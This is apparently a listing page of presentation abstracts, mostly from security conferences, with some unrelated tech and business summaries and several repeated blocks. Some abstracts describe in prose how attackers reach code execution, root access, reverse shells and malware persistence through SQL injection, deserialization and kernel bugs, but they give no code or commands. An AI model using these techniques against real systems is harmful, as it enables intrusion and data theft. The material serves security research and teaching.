Presented by Dor Tumarkin, Application Security Researcher and Team Leader at Checkmarx
Take the plunge into deserialization attacks - from understanding the fundamentals of serialization to vulnerability breakdown, through RCE demos in various technologies (Java, C#, Python). Includes research and exploit demo of never-before-seen vulnerabilities in Microsoft’s Message Queue.
Originally presented at BSidesLV 2018 and AppSecIL 2018. Slides have been altered to remove animations.
Python 3000 (Python 3.0) is an upcoming major release that will break backwards compatibility to fix early design mistakes and issues. It introduces many changes like Unicode as the default string type, a reworked I/O library, print as a function, and removal of some old features like classic classes. The document provides details on the changes and recommends projects support both Python 2.6 and 3.0 during the transition period.
Joxean Koret - Database Security Paradise [Rooted CON 2011]RootedCON
The document discusses vulnerabilities found in various database software products through analyzing their code and installation directories. Local privilege escalation bugs were found in IBM DB2 and Informix by exploiting how environment variables and shared libraries were handled. Remote code execution bugs were also discovered in UniData and Informix through fuzzing protocols and by exploiting unsafe functions. The document encourages searching for more bugs in database software.
This document discusses various overflow issues that can occur with the splice and vmsplice Linux kernel functions. It describes stack and buffer overflows that can happen due to race conditions when accessing pipe buffers. It also proposes a pool overflow technique using SLUB memory and controlled data read from a TTY device to spray the kernel memory and potentially overflow adjacent objects. Finally, it notes that further research is needed to determine a suitable target and exploit methodology, and hints that pipe buffer sizes may allow overflowing kernel memory allocations.
Codetainer: a Docker-based browser code 'sandbox'Jen Andre
Codetainer is a browser-based sandbox for running Docker containers. It allows users to "try 'X' in your browser" for any X by running Docker containers in an isolated and programmable manner directly in the browser. Codetainer uses Docker APIs to launch and manage lightweight containers via a Go-based API server. Users can create and register Docker images, launch "codetainers" from those images, and interact with the codetainers through the browser via websockets, viewing terminals and sending keystrokes. Codetainer aims to provide a secure and flexible environment for use cases like tutorials, training, and remote management while addressing challenges around container introspection and security.
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...CODE BLUE
In this talk, we are going to disclose two unconventional Use-after-free kernel bugs on Android we found last year, and introduce the new techniques we used to make these exploits 100% reliable.
The first bug is CVE-2017-0403, which we used to gain root privilege on almost all devices shipped with 3.10 or earlier Linux kernel last year. So far more than 14 million users have successfully rooted their smartphones with this exploit. With this vulnerability, an attacker only can overwrite the freed object at a fixed offset with a pointer to object itself. How to achieve kernel code execution with this bug can be very challenging.To solve the problem, we propose a new method which is using iovec to re-fill the freed object and compromising the pipe subsystem in kernel.In this way we can covert this unusual memory corruption to arbitrary kernel memory overwriting.
The second bug is CVE-2016-6787. The bug is an UAF due to race condition, may corrupt a critical kernel structure, and lead to the kernel crash when scheduler switched context back to attacker's process. So we'll introduce a way to freeze the attacker's process soon after UAF happened ,stop kernel from crashing, and make the exploit reliable.
In summary, this presentation gives out the new techniques of exploiting use-after-free bugs we just found in Android kernel. The ideas of exploitation are fresh, detail of bugs is also never discussed before.
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
In theory, post-exploitation after having remote access is easy. Also in theory, there is no difference between theory and practice. In practice, there is. Imagine a scenario, where the hacker/penetration-tester has deployed a malware on a user's workstation, but the target information is on a secure server accessed via two-factor authentication, with screen access only (e.g. RDP, Citrix, etc.) On top of that, the server runs application white-listing, and only the inbound port to the screen server (e.g. 3389) is allowed through the hardware firewall. But you also need persistent interactive C&C communication (e.g. Netcat, Meterpreter, RAT) to this server through the user's workstation.
I developed (and will publish) two tools that help the community in these situations. The first tool can drop malware to the server through the screen while the user is logged in. The second tool can help to circumvent the hardware firewall after one can execute code on the server with admin privileges (using a signed kernel driver). My tools have been tested against Windows server 2012 and Windows 8, and they work with RDP or other remote desktops (e.g. Citrix). The number of problems one can solve with them are endless, e.g., communicating with bind-shell on webserver behind restricted DMZ. Beware, live demo and fun included!
Day by day, we store more and more confidential information on our computers, from sites account credentials to our bank account. Every day, malware becomes more and more silent, they don’t want you to be suspicious, they just want to stay into your device to do something …that you don’t really want.
Richard wartell malware is hard. let's go shopping!!Shakacon
Writing a successful, protected, targeted, malicious binary is a software development task that requires great skill. A well-written piece of targeted malware should evade anti-virus solutions, hide its network communications, protect itself against reverse engineering, and clean up any forensic evidence of its existence on the system. However, writing a mediocre piece of targeted malware that works most of the time is easy. There are many publicly available backdoors, downloaders, and keyloggers that require little to no expertise to use, and poorly trained malware authors try to roll their own all the time.
Working in malware detection and reverse engineering, I see some of the intelligent choices malware authors make, but more often I see the hilariously poor code they write. During this talk I will demonstrate how to reverse engineer real world malware. I will focus on samples with interesting and comical mistakes, as well as samples that are impressive and well written.
Python 3000 (Python 3.0) is an upcoming major release that will break backwards compatibility to fix early design mistakes and issues. It introduces many changes like Unicode as the default string type, a reworked I/O library, print as a function, and removal of some old features like classic classes. The document provides details on the changes and recommends projects support both Python 2.6 and 3.0 during the transition period.
Joxean Koret - Database Security Paradise [Rooted CON 2011]RootedCON
The document discusses vulnerabilities found in various database software products through analyzing their code and installation directories. Local privilege escalation bugs were found in IBM DB2 and Informix by exploiting how environment variables and shared libraries were handled. Remote code execution bugs were also discovered in UniData and Informix through fuzzing protocols and by exploiting unsafe functions. The document encourages searching for more bugs in database software.
This document discusses various overflow issues that can occur with the splice and vmsplice Linux kernel functions. It describes stack and buffer overflows that can happen due to race conditions when accessing pipe buffers. It also proposes a pool overflow technique using SLUB memory and controlled data read from a TTY device to spray the kernel memory and potentially overflow adjacent objects. Finally, it notes that further research is needed to determine a suitable target and exploit methodology, and hints that pipe buffer sizes may allow overflowing kernel memory allocations.
Codetainer: a Docker-based browser code 'sandbox'Jen Andre
Codetainer is a browser-based sandbox for running Docker containers. It allows users to "try 'X' in your browser" for any X by running Docker containers in an isolated and programmable manner directly in the browser. Codetainer uses Docker APIs to launch and manage lightweight containers via a Go-based API server. Users can create and register Docker images, launch "codetainers" from those images, and interact with the codetainers through the browser via websockets, viewing terminals and sending keystrokes. Codetainer aims to provide a secure and flexible environment for use cases like tutorials, training, and remote management while addressing challenges around container introspection and security.
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...CODE BLUE
In this talk, we are going to disclose two unconventional Use-after-free kernel bugs on Android we found last year, and introduce the new techniques we used to make these exploits 100% reliable.
The first bug is CVE-2017-0403, which we used to gain root privilege on almost all devices shipped with 3.10 or earlier Linux kernel last year. So far more than 14 million users have successfully rooted their smartphones with this exploit. With this vulnerability, an attacker only can overwrite the freed object at a fixed offset with a pointer to object itself. How to achieve kernel code execution with this bug can be very challenging.To solve the problem, we propose a new method which is using iovec to re-fill the freed object and compromising the pipe subsystem in kernel.In this way we can covert this unusual memory corruption to arbitrary kernel memory overwriting.
The second bug is CVE-2016-6787. The bug is an UAF due to race condition, may corrupt a critical kernel structure, and lead to the kernel crash when scheduler switched context back to attacker's process. So we'll introduce a way to freeze the attacker's process soon after UAF happened ,stop kernel from crashing, and make the exploit reliable.
In summary, this presentation gives out the new techniques of exploiting use-after-free bugs we just found in Android kernel. The ideas of exploitation are fresh, detail of bugs is also never discussed before.
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
In theory, post-exploitation after having remote access is easy. Also in theory, there is no difference between theory and practice. In practice, there is. Imagine a scenario, where the hacker/penetration-tester has deployed a malware on a user's workstation, but the target information is on a secure server accessed via two-factor authentication, with screen access only (e.g. RDP, Citrix, etc.) On top of that, the server runs application white-listing, and only the inbound port to the screen server (e.g. 3389) is allowed through the hardware firewall. But you also need persistent interactive C&C communication (e.g. Netcat, Meterpreter, RAT) to this server through the user's workstation.
I developed (and will publish) two tools that help the community in these situations. The first tool can drop malware to the server through the screen while the user is logged in. The second tool can help to circumvent the hardware firewall after one can execute code on the server with admin privileges (using a signed kernel driver). My tools have been tested against Windows server 2012 and Windows 8, and they work with RDP or other remote desktops (e.g. Citrix). The number of problems one can solve with them are endless, e.g., communicating with bind-shell on webserver behind restricted DMZ. Beware, live demo and fun included!
Day by day, we store more and more confidential information on our computers, from sites account credentials to our bank account. Every day, malware becomes more and more silent, they don’t want you to be suspicious, they just want to stay into your device to do something …that you don’t really want.
Richard wartell malware is hard. let's go shopping!!Shakacon
Writing a successful, protected, targeted, malicious binary is a software development task that requires great skill. A well-written piece of targeted malware should evade anti-virus solutions, hide its network communications, protect itself against reverse engineering, and clean up any forensic evidence of its existence on the system. However, writing a mediocre piece of targeted malware that works most of the time is easy. There are many publicly available backdoors, downloaders, and keyloggers that require little to no expertise to use, and poorly trained malware authors try to roll their own all the time.
Working in malware detection and reverse engineering, I see some of the intelligent choices malware authors make, but more often I see the hilariously poor code they write. During this talk I will demonstrate how to reverse engineer real world malware. I will focus on samples with interesting and comical mistakes, as well as samples that are impressive and well written.
New and improved hacking oracle from web apps sumit sidharthowaspindia
This document discusses hacking Oracle databases from web applications. It describes how SQL injection vulnerabilities in web apps connected to Oracle databases can be used to escalate privileges and execute operating system commands. Specifically, it outlines how the dbms_xmlquery.newcontext() and dbms_xmlquery.getxml() functions allow executing arbitrary PL/SQL, which can then exploit other vulnerabilities to gain DBA access privileges and run operating system code. Examples are provided that demonstrate exploiting vulnerabilities to gain DBA privileges and executing Metasploit payloads on the database server.
This document provides instructions on how to use SQL injection to execute operating system commands on a Microsoft SQL Server and retrieve a reverse shell within 30 minutes of a penetration test. It demonstrates exploiting SQL injection to execute a VBScript that downloads and executes a binary, providing remote code execution on the system through a reverse shell. Tricks are discussed like using VBPacker to obfuscate the payload and bypass outbound filtering. The ability to leverage this technique through other vulnerabilities like CSRF is also mentioned.
We will talk about edge cases we don't usually think about, show examples from the real world, and share some tips and best practices on how to make your code safer in the real world.
This document provides an overview of Python fundamentals including basic concepts like data types, operators, flow control, functions and classes. It begins with an introduction to Python versions and environments. The outline covers topics like Hello World, common types and operators for numeric, string and container data types. It also discusses flow control structures like if/else, while loops and for loops. Finally, it briefly mentions functions, classes, exceptions and file I/O.
This document discusses how to protect databases from SQL injection vulnerabilities by fuzz testing databases to find vulnerabilities before hackers do. It covers common SQL injection techniques like in-band and out-of-band injection. It then describes how to build a custom fuzzer using PL/SQL to fuzz test databases, track results, discover vulnerable code, invoke code with test parameters, and report findings. The document demonstrates how fuzz testing can find real vulnerabilities and provides examples of an interface and secure coding techniques to help prevent vulnerabilities.
This document introduces Interpolique, a new approach to string interpolation that aims to prevent SQL injection and other injection attacks. It demonstrates how Interpolique works by rewriting inline SQL queries to use parameterized queries behind the scenes. Interpolique uses base64 encoding to safely pass variable data into queries. It allows developers to write queries inline while still protecting against injection. The goal is to let developers write code as they normally would but make injection attacks much harder to perform.
This document discusses Dan Kaminsky's presentation on black ops of TCP/IP. It begins with an introduction of Kaminsky and what topics he plans to cover, including MD5 hashes, IP fragmentation, firewall/IPS fingerprinting, DNS poisoning, and scanning the internet. It then demonstrates how two webpages with different content can have the same MD5 hash due to collisions. It discusses using IP fragmentation and timing attacks to evade intrusion detection systems. It also describes techniques for fingerprinting firewalls and intrusion prevention systems based on their behavior in response to invalid traffic. Finally, it cautions against automatic shunning of IP addresses by security devices to avoid accidentally blocking critical infrastructure like root DNS servers.
This document provides an overview of JavaScript concepts and best practices. It discusses objects as hashes, functions as first-class objects, loose typing, closures, prototypes, JSON, cross-domain AJAX, testing with Jasmine, CoffeeScript, libraries like jQuery, global scope issues, regular expressions, XSS, hoisting, and other JavaScript quirks. It also provides resources for further learning JavaScript.
Get-Help: An intro to PowerShell and how to Use it for Eviljaredhaight
This talk covers the basics of how PowerShell works and how to use it. It then goes over a lot of the interesting offensive PowerShell tools that are available and gives a demo of using PowerShell to escalate to Domain Admin privileges on a network.
A video of the talk is available here: https://www.youtube.com/watch?v=YSUJNInriiY
This document contains notes from a presentation given by Neal Ford on productivity techniques for programmers. Some key topics covered include: accelerating work by using keyboard shortcuts, search over navigation, reducing distractions, applying DRY principles, and automating repetitive tasks. Ford advocates focusing on acceleration, focus, and automation to work more efficiently. He provides many examples of tools and techniques to improve productivity.
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassRob Fuller
This talk is about methodologies and tools that we use or have coded that make our lives and pentest schedule a little easier, and why we do things the way we do. Of course, there will be a healthy dose of Metasploit in the mix.
This document provides an agenda and overview for a talk on exploiting SQL injections from web applications against Oracle databases. The talk covers topics like PL/SQL vs SQL injection, extracting data, privilege escalation, OS code execution, second order attacks, and tools for exploitation like Bsqlbf. It discusses challenges like limitations of SQL in Oracle and lack of documentation. Examples are provided for various exploits like using DBMS_EXPORT_EXTENSION and DBMS_JAVA_TEST functions to escalate privileges or execute OS commands.
Slackware Demystified provides an overview of the Slackware Linux distribution. It discusses Slackware's philosophy of keeping things simple and sticking close to upstream. It describes Slackware's init system, configuration files, package structure, and community support. The presentation emphasizes Slackware's minimalist approach and encourages learning through documentation rather than abstracted interfaces.
Dan Kaminsky introduces his new company Recursion Ventures and discusses session management on the web. He explains that the web was not designed for authenticated resources and credentials are easily accessible across sites due to issues with cookie-based session management. Kaminsky proposes using smarter string interpolation to allow developers to write code inline while preventing injections. He demonstrates a prototype called Interpolique that uses base64 encoding to sanitize variables before insertion into queries. This approach aims to make secure coding easier and mistakes immediately apparent.
Drupal Camp Atlanta 2011 - Drupal SecurityMediacurrent
Introduction to security on Drupal and introduces some testing tools, common problems and solutions.
We also introduce the concept of a response team and best practices to get you started.
Presented at BJUG, 6/12/2012 by Roger Brinkley
This talk is on 55 new features in Java 7 you (probably) didn't hear about in an ignite format of one per minute. No stopping, no going back....Questions, sure but only if time remains (otherwise save for later).
The document summarizes some of the new features introduced in Java 7. It discusses binary literals, underscores in numeric literals, strings in switch statements, automatic resource management using try-with-resources, multi-catch exceptions, more precise rethrowing of exceptions, diamond operator for generic types, varargs warnings and suppression, Java NIO.2 features for file navigation, directories, symbolic links, and walking file trees. The document provides examples and explanations of how to use these new Java 7 language features.
DEF CON 27 - TRAVIS PALMER - first try dns cache poisoning with ipv4 and ipv6...Felipe Prado
This document discusses a DNS cache poisoning attack that exploits IP fragmentation. It begins with background on DNS and DNSSEC. It then explains how predictable IPIDs in DNS responses can be inferred, allowing an off-path attacker to poison caches with few attempts. The attack works across IPv4 and IPv6 by targeting predictable timing of DNS requests. Mitigations are discussed but the attack remains effective against current recommendations.
1. This document introduces IDAPython, which allows users to write Python scripts to automate tasks in IDA like reversing binaries.
2. It discusses how to install IDAPython and provides some simple examples of using it to walk functions and disassembly.
3. More complex examples are provided for finding system calls in a binary and for deobfuscating code using IDAPython scripts. Exercises are suggested for finding vulnerabilities using IDAPython.
HCL Notes and Domino License Cost Reduction in the World of DLAUpanagenda
Webinar Recording: https://www.panagenda.com/webinars/hcl-notes-and-domino-license-cost-reduction-in-the-world-of-dlau/
The introduction of DLAU and the CCB & CCX licensing model caused quite a stir in the HCL community. As a Notes and Domino customer, you may have faced challenges with unexpected user counts and license costs. You probably have questions on how this new licensing approach works and how to benefit from it. Most importantly, you likely have budget constraints and want to save money where possible. Don’t worry, we can help with all of this!
We’ll show you how to fix common misconfigurations that cause higher-than-expected user counts, and how to identify accounts which you can deactivate to save money. There are also frequent patterns that can cause unnecessary cost, like using a person document instead of a mail-in for shared mailboxes. We’ll provide examples and solutions for those as well. And naturally we’ll explain the new licensing model.
Join HCL Ambassador Marc Thomas in this webinar with a special guest appearance from Franz Walder. It will give you the tools and know-how to stay on top of what is going on with Domino licensing. You will be able lower your cost through an optimized configuration and keep it low going forward.
These topics will be covered
- Reducing license cost by finding and fixing misconfigurations and superfluous accounts
- How do CCB and CCX licenses really work?
- Understanding the DLAU tool and how to best utilize it
- Tips for common problem areas, like team mailboxes, functional/test users, etc
- Practical examples and best practices to implement right away
New and improved hacking oracle from web apps sumit sidharthowaspindia
This document discusses hacking Oracle databases from web applications. It describes how SQL injection vulnerabilities in web apps connected to Oracle databases can be used to escalate privileges and execute operating system commands. Specifically, it outlines how the dbms_xmlquery.newcontext() and dbms_xmlquery.getxml() functions allow executing arbitrary PL/SQL, which can then exploit other vulnerabilities to gain DBA access privileges and run operating system code. Examples are provided that demonstrate exploiting vulnerabilities to gain DBA privileges and executing Metasploit payloads on the database server.
This document provides instructions on how to use SQL injection to execute operating system commands on a Microsoft SQL Server and retrieve a reverse shell within 30 minutes of a penetration test. It demonstrates exploiting SQL injection to execute a VBScript that downloads and executes a binary, providing remote code execution on the system through a reverse shell. Tricks are discussed like using VBPacker to obfuscate the payload and bypass outbound filtering. The ability to leverage this technique through other vulnerabilities like CSRF is also mentioned.
We will talk about edge cases we don't usually think about, show examples from the real world, and share some tips and best practices on how to make your code safer in the real world.
This document provides an overview of Python fundamentals including basic concepts like data types, operators, flow control, functions and classes. It begins with an introduction to Python versions and environments. The outline covers topics like Hello World, common types and operators for numeric, string and container data types. It also discusses flow control structures like if/else, while loops and for loops. Finally, it briefly mentions functions, classes, exceptions and file I/O.
This document discusses how to protect databases from SQL injection vulnerabilities by fuzz testing databases to find vulnerabilities before hackers do. It covers common SQL injection techniques like in-band and out-of-band injection. It then describes how to build a custom fuzzer using PL/SQL to fuzz test databases, track results, discover vulnerable code, invoke code with test parameters, and report findings. The document demonstrates how fuzz testing can find real vulnerabilities and provides examples of an interface and secure coding techniques to help prevent vulnerabilities.
This document introduces Interpolique, a new approach to string interpolation that aims to prevent SQL injection and other injection attacks. It demonstrates how Interpolique works by rewriting inline SQL queries to use parameterized queries behind the scenes. Interpolique uses base64 encoding to safely pass variable data into queries. It allows developers to write queries inline while still protecting against injection. The goal is to let developers write code as they normally would but make injection attacks much harder to perform.
This document discusses Dan Kaminsky's presentation on black ops of TCP/IP. It begins with an introduction of Kaminsky and what topics he plans to cover, including MD5 hashes, IP fragmentation, firewall/IPS fingerprinting, DNS poisoning, and scanning the internet. It then demonstrates how two webpages with different content can have the same MD5 hash due to collisions. It discusses using IP fragmentation and timing attacks to evade intrusion detection systems. It also describes techniques for fingerprinting firewalls and intrusion prevention systems based on their behavior in response to invalid traffic. Finally, it cautions against automatic shunning of IP addresses by security devices to avoid accidentally blocking critical infrastructure like root DNS servers.
This document provides an overview of JavaScript concepts and best practices. It discusses objects as hashes, functions as first-class objects, loose typing, closures, prototypes, JSON, cross-domain AJAX, testing with Jasmine, CoffeeScript, libraries like jQuery, global scope issues, regular expressions, XSS, hoisting, and other JavaScript quirks. It also provides resources for further learning JavaScript.
Get-Help: An intro to PowerShell and how to Use it for Eviljaredhaight
This talk covers the basics of how PowerShell works and how to use it. It then goes over a lot of the interesting offensive PowerShell tools that are available and gives a demo of using PowerShell to escalate to Domain Admin privileges on a network.
A video of the talk is available here: https://www.youtube.com/watch?v=YSUJNInriiY
This document contains notes from a presentation given by Neal Ford on productivity techniques for programmers. Some key topics covered include: accelerating work by using keyboard shortcuts, search over navigation, reducing distractions, applying DRY principles, and automating repetitive tasks. Ford advocates focusing on acceleration, focus, and automation to work more efficiently. He provides many examples of tools and techniques to improve productivity.
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassRob Fuller
This talk is about methodologies and tools that we use or have coded that make our lives and pentest schedule a little easier, and why we do things the way we do. Of course, there will be a healthy dose of Metasploit in the mix.
This document provides an agenda and overview for a talk on exploiting SQL injections from web applications against Oracle databases. The talk covers topics like PL/SQL vs SQL injection, extracting data, privilege escalation, OS code execution, second order attacks, and tools for exploitation like Bsqlbf. It discusses challenges like limitations of SQL in Oracle and lack of documentation. Examples are provided for various exploits like using DBMS_EXPORT_EXTENSION and DBMS_JAVA_TEST functions to escalate privileges or execute OS commands.
Slackware Demystified provides an overview of the Slackware Linux distribution. It discusses Slackware's philosophy of keeping things simple and sticking close to upstream. It describes Slackware's init system, configuration files, package structure, and community support. The presentation emphasizes Slackware's minimalist approach and encourages learning through documentation rather than abstracted interfaces.
Dan Kaminsky introduces his new company Recursion Ventures and discusses session management on the web. He explains that the web was not designed for authenticated resources and credentials are easily accessible across sites due to issues with cookie-based session management. Kaminsky proposes using smarter string interpolation to allow developers to write code inline while preventing injections. He demonstrates a prototype called Interpolique that uses base64 encoding to sanitize variables before insertion into queries. This approach aims to make secure coding easier and mistakes immediately apparent.
Drupal Camp Atlanta 2011 - Drupal SecurityMediacurrent
Introduction to security on Drupal and introduces some testing tools, common problems and solutions.
We also introduce the concept of a response team and best practices to get you started.
Presented at BJUG, 6/12/2012 by Roger Brinkley
This talk is on 55 new features in Java 7 you (probably) didn't hear about in an ignite format of one per minute. No stopping, no going back....Questions, sure but only if time remains (otherwise save for later).
The document summarizes some of the new features introduced in Java 7. It discusses binary literals, underscores in numeric literals, strings in switch statements, automatic resource management using try-with-resources, multi-catch exceptions, more precise rethrowing of exceptions, diamond operator for generic types, varargs warnings and suppression, Java NIO.2 features for file navigation, directories, symbolic links, and walking file trees. The document provides examples and explanations of how to use these new Java 7 language features.
DEF CON 27 - TRAVIS PALMER - first try dns cache poisoning with ipv4 and ipv6...Felipe Prado
This document discusses a DNS cache poisoning attack that exploits IP fragmentation. It begins with background on DNS and DNSSEC. It then explains how predictable IPIDs in DNS responses can be inferred, allowing an off-path attacker to poison caches with few attempts. The attack works across IPv4 and IPv6 by targeting predictable timing of DNS requests. Mitigations are discussed but the attack remains effective against current recommendations.
1. This document introduces IDAPython, which allows users to write Python scripts to automate tasks in IDA like reversing binaries.
2. It discusses how to install IDAPython and provides some simple examples of using it to walk functions and disassembly.
3. More complex examples are provided for finding system calls in a binary and for deobfuscating code using IDAPython scripts. Exercises are suggested for finding vulnerabilities using IDAPython.
HCL Notes and Domino License Cost Reduction in the World of DLAUpanagenda
Webinar Recording: https://www.panagenda.com/webinars/hcl-notes-and-domino-license-cost-reduction-in-the-world-of-dlau/
The introduction of DLAU and the CCB & CCX licensing model caused quite a stir in the HCL community. As a Notes and Domino customer, you may have faced challenges with unexpected user counts and license costs. You probably have questions on how this new licensing approach works and how to benefit from it. Most importantly, you likely have budget constraints and want to save money where possible. Don’t worry, we can help with all of this!
We’ll show you how to fix common misconfigurations that cause higher-than-expected user counts, and how to identify accounts which you can deactivate to save money. There are also frequent patterns that can cause unnecessary cost, like using a person document instead of a mail-in for shared mailboxes. We’ll provide examples and solutions for those as well. And naturally we’ll explain the new licensing model.
Join HCL Ambassador Marc Thomas in this webinar with a special guest appearance from Franz Walder. It will give you the tools and know-how to stay on top of what is going on with Domino licensing. You will be able lower your cost through an optimized configuration and keep it low going forward.
These topics will be covered
- Reducing license cost by finding and fixing misconfigurations and superfluous accounts
- How do CCB and CCX licenses really work?
- Understanding the DLAU tool and how to best utilize it
- Tips for common problem areas, like team mailboxes, functional/test users, etc
- Practical examples and best practices to implement right away
Northern Engraving | Nameplate Manufacturing Process - 2024Northern Engraving
Manufacturing custom quality metal nameplates and badges involves several standard operations. Processes include sheet prep, lithography, screening, coating, punch press and inspection. All decoration is completed in the flat sheet with adhesive and tooling operations following. The possibilities for creating unique durable nameplates are endless. How will you create your brand identity? We can help!
For the full video of this presentation, please visit: https://www.edge-ai-vision.com/2024/06/temporal-event-neural-networks-a-more-efficient-alternative-to-the-transformer-a-presentation-from-brainchip/
Chris Jones, Director of Product Management at BrainChip , presents the “Temporal Event Neural Networks: A More Efficient Alternative to the Transformer” tutorial at the May 2024 Embedded Vision Summit.
The expansion of AI services necessitates enhanced computational capabilities on edge devices. Temporal Event Neural Networks (TENNs), developed by BrainChip, represent a novel and highly efficient state-space network. TENNs demonstrate exceptional proficiency in handling multi-dimensional streaming data, facilitating advancements in object detection, action recognition, speech enhancement and language model/sequence generation. Through the utilization of polynomial-based continuous convolutions, TENNs streamline models, expedite training processes and significantly diminish memory requirements, achieving notable reductions of up to 50x in parameters and 5,000x in energy consumption compared to prevailing methodologies like transformers.
Integration with BrainChip’s Akida neuromorphic hardware IP further enhances TENNs’ capabilities, enabling the realization of highly capable, portable and passively cooled edge devices. This presentation delves into the technical innovations underlying TENNs, presents real-world benchmarks, and elucidates how this cutting-edge approach is positioned to revolutionize edge AI across diverse applications.
What is an RPA CoE? Session 1 – CoE VisionDianaGray10
In the first session, we will review the organization's vision and how this has an impact on the COE Structure.
Topics covered:
• The role of a steering committee
• How do the organization’s priorities determine CoE Structure?
Speaker:
Chris Bolin, Senior Intelligent Automation Architect Anika Systems
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...Alex Pruden
Folding is a recent technique for building efficient recursive SNARKs. Several elegant folding protocols have been proposed, such as Nova, Supernova, Hypernova, Protostar, and others. However, all of them rely on an additively homomorphic commitment scheme based on discrete log, and are therefore not post-quantum secure. In this work we present LatticeFold, the first lattice-based folding protocol based on the Module SIS problem. This folding protocol naturally leads to an efficient recursive lattice-based SNARK and an efficient PCD scheme. LatticeFold supports folding low-degree relations, such as R1CS, as well as high-degree relations, such as CCS. The key challenge is to construct a secure folding protocol that works with the Ajtai commitment scheme. The difficulty, is ensuring that extracted witnesses are low norm through many rounds of folding. We present a novel technique using the sumcheck protocol to ensure that extracted witnesses are always low norm no matter how many rounds of folding are used. Our evaluation of the final proof system suggests that it is as performant as Hypernova, while providing post-quantum security.
Paper Link: https://eprint.iacr.org/2024/257
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdfChart Kalyan
A Mix Chart displays historical data of numbers in a graphical or tabular form. The Kalyan Rajdhani Mix Chart specifically shows the results of a sequence of numbers over different periods.
Conversational agents, or chatbots, are increasingly used to access all sorts of services using natural language. While open-domain chatbots - like ChatGPT - can converse on any topic, task-oriented chatbots - the focus of this paper - are designed for specific tasks, like booking a flight, obtaining customer support, or setting an appointment. Like any other software, task-oriented chatbots need to be properly tested, usually by defining and executing test scenarios (i.e., sequences of user-chatbot interactions). However, there is currently a lack of methods to quantify the completeness and strength of such test scenarios, which can lead to low-quality tests, and hence to buggy chatbots.
To fill this gap, we propose adapting mutation testing (MuT) for task-oriented chatbots. To this end, we introduce a set of mutation operators that emulate faults in chatbot designs, an architecture that enables MuT on chatbots built using heterogeneous technologies, and a practical realisation as an Eclipse plugin. Moreover, we evaluate the applicability, effectiveness and efficiency of our approach on open-source chatbots, with promising results.
Your One-Stop Shop for Python Success: Top 10 US Python Development Providersakankshawande
Simplify your search for a reliable Python development partner! This list presents the top 10 trusted US providers offering comprehensive Python development services, ensuring your project's success from conception to completion.
"Choosing proper type of scaling", Olena SyrotaFwdays
Imagine an IoT processing system that is already quite mature and production-ready and for which client coverage is growing and scaling and performance aspects are life and death questions. The system has Redis, MongoDB, and stream processing based on ksqldb. In this talk, firstly, we will analyze scaling approaches and then select the proper ones for our system.
Main news related to the CCS TSI 2023 (2023/1695)Jakub Marek
An English 🇬🇧 translation of a presentation to the speech I gave about the main changes brought by CCS TSI 2023 at the biggest Czech conference on Communications and signalling systems on Railways, which was held in Clarion Hotel Olomouc from 7th to 9th November 2023 (konferenceszt.cz). Attended by around 500 participants and 200 on-line followers.
The original Czech 🇨🇿 version of the presentation can be found here: https://www.slideshare.net/slideshow/hlavni-novinky-souvisejici-s-ccs-tsi-2023-2023-1695/269688092 .
The videorecording (in Czech) from the presentation is available here: https://youtu.be/WzjJWm4IyPk?si=SImb06tuXGb30BEH .
Generating privacy-protected synthetic data using Secludy and MilvusZilliz
During this demo, the founders of Secludy will demonstrate how their system utilizes Milvus to store and manipulate embeddings for generating privacy-protected synthetic data. Their approach not only maintains the confidentiality of the original data but also enhances the utility and scalability of LLMs under privacy constraints. Attendees, including machine learning engineers, data scientists, and data managers, will witness first-hand how Secludy's integration with Milvus empowers organizations to harness the power of LLMs securely and efficiently.
In the realm of cybersecurity, offensive security practices act as a critical shield. By simulating real-world attacks in a controlled environment, these techniques expose vulnerabilities before malicious actors can exploit them. This proactive approach allows manufacturers to identify and fix weaknesses, significantly enhancing system security.
This presentation delves into the development of a system designed to mimic Galileo's Open Service signal using software-defined radio (SDR) technology. We'll begin with a foundational overview of both Global Navigation Satellite Systems (GNSS) and the intricacies of digital signal processing.
The presentation culminates in a live demonstration. We'll showcase the manipulation of Galileo's Open Service pilot signal, simulating an attack on various software and hardware systems. This practical demonstration serves to highlight the potential consequences of unaddressed vulnerabilities, emphasizing the importance of offensive security practices in safeguarding critical infrastructure.
The Microsoft 365 Migration Tutorial For Beginner.pptxoperationspcvita
This presentation will help you understand the power of Microsoft 365. However, we have mentioned every productivity app included in Office 365. Additionally, we have suggested the migration situation related to Office 365 and how we can help you.
You can also read: https://www.systoolsgroup.com/updates/office-365-tenant-to-tenant-migration-step-by-step-complete-guide/
Digital Banking in the Cloud: How Citizens Bank Unlocked Their MainframePrecisely
Inconsistent user experience and siloed data, high costs, and changing customer expectations – Citizens Bank was experiencing these challenges while it was attempting to deliver a superior digital banking experience for its clients. Its core banking applications run on the mainframe and Citizens was using legacy utilities to get the critical mainframe data to feed customer-facing channels, like call centers, web, and mobile. Ultimately, this led to higher operating costs (MIPS), delayed response times, and longer time to market.
Ever-changing customer expectations demand more modern digital experiences, and the bank needed to find a solution that could provide real-time data to its customer channels with low latency and operating costs. Join this session to learn how Citizens is leveraging Precisely to replicate mainframe data to its customer channels and deliver on their “modern digital bank” experiences.
Driving Business Innovation: Latest Generative AI Advancements & Success StorySafe Software
Are you ready to revolutionize how you handle data? Join us for a webinar where we’ll bring you up to speed with the latest advancements in Generative AI technology and discover how leveraging FME with tools from giants like Google Gemini, Amazon, and Microsoft OpenAI can supercharge your workflow efficiency.
During the hour, we’ll take you through:
Guest Speaker Segment with Hannah Barrington: Dive into the world of dynamic real estate marketing with Hannah, the Marketing Manager at Workspace Group. Hear firsthand how their team generates engaging descriptions for thousands of office units by integrating diverse data sources—from PDF floorplans to web pages—using FME transformers, like OpenAIVisionConnector and AnthropicVisionConnector. This use case will show you how GenAI can streamline content creation for marketing across the board.
Ollama Use Case: Learn how Scenario Specialist Dmitri Bagh has utilized Ollama within FME to input data, create custom models, and enhance security protocols. This segment will include demos to illustrate the full capabilities of FME in AI-driven processes.
Custom AI Models: Discover how to leverage FME to build personalized AI models using your data. Whether it’s populating a model with local data for added security or integrating public AI tools, find out how FME facilitates a versatile and secure approach to AI.
